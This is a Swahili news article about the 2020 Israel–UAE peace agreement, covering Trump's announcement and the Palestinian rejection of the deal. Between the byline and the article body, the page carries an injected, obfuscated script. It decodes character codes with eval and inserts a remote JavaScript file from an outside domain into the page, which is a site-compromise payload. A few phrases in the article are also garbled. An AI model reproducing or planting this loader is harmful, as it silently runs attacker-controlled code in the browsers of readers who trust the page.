Recent Comments

Mzozo wa Irael na Palestina: Israel na Umoja wa Falme za Kiarabu zafikia mkataba wa amani wa kihistoria

By ObyMack David Aug 14, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Israel na Umoja wa Falme za Kiarabu,(UAE) zimefikia mkataba utakaofanya kuwa rasmi uhusiano kati ya nchi hizo mbili baada ya Israel kukubali kusitisha mpango wenye utata wa kuzifanya kuwa makazi ya Kiyahudi maeneo ya ukanda wa magharibi yanayokaliwa na Wapalestina.

Katika hatua ambayo haikutarajiwa Rais wa Marekani Donald Trump, ambaye alisaidia nchi hizo kufikia mkataba huo aliutaja kuwa wa “kihistoria” na mafanikio makubwa kuelekea upatikanaji wa amani.

Mpaka sasa Israel haina uhusiano wowote wa kidiplomasia na nchi za Ghuba na Uarabuni.

Lakini changamoto ya pamoja kuhusu Iran imechangia kuwepo kwa mawasiliano yasiyo rasmi kati ya nchi hizo mbili.

Viongozi wa Palestina wameripotiwa kushangazwa na hatua hiyo. Msemaji wa Rais Mahmoud Abbas amesema mkataba huo ni “uhaini”, na kwamba balozi wa UAE anarudishwa nyumbani.

Rais Trump ameutaja mkataba wa maelewano kati ya Waziri Mkuu wa Israel Benjamin Netanyahu na Mwanamfalme mtawala wa Abu Dhabi Mohammed Al Nahyan kuwa “kihistoria halisi”. Hatua hiyo Inaashiria mpango wa tatu wa amani wa Israeli na Waarabu tangu kutangazwa kwa Israeli uhuru mnamo 1948, baada ya Misri na Jordan.

“Kufuatia hatua hii natarajia Waarabu na chi za Kiislam kufuata mkondo wa Muungano wa Milki za Kiarabu,” aliwaambia wanahabari katika ofosi yake ya Oval, akiongeza kwamba kutakua na hafla ya kutia saint mkataba duo Katina Ikulu ya White House wiki zijazo.

Awali, Rais aliweka tangazo la kufikiwa kwa mkataba huo katika Twitter yake, na kuandika Bw.Netanyahu kwa kiyahudi: “Siku ya Kihistoria.

Katika wiki cache zijazo wajumbe wa Israel na UAE watakutana kutia saini mkataba kuhusu uwekezaji, utalii, safari ya ndege ya moja kwa moja, usalama, mawasiliano, teknolojia, kawi, afya , utamaduni, mazingira na kufunguliwa kwa ubalozi pande zote mbili miongoni mwa masuala mengine yatakayonufaisha nchi hizo.”Kuwa na ushirikiano wa moja kwa moja kati ya nchi mbili zilizo na uwezo Mashariki ya Kati kutaimarisha uchumi na ni hatua ambayo italeta pamoja jamii eneo hili,” taarifa ya pamoja ilisema.

Israeli pia “itasimamisha kutangaza umiliki wa maeneo yaliyoainishwa” katika ruwaza ya Rais Trump ya Amani kati ya Israeli na Wapalestina, ambamo aliunga mkono mpango wa Israeli wa kuzifanya makazi ya Kiyahudi katika maeneo ya Ukanda wa Magharibi pamoja na bonde la Jordon.

Wapalestina wameonya kwamba hatua kama hiyo itaharibu matarajio yao ya serikali huru ya uhuru na kukiuka sheria za kimataifa – msimamo unaoungwa mkono na jamii kubwa ya kimataifa.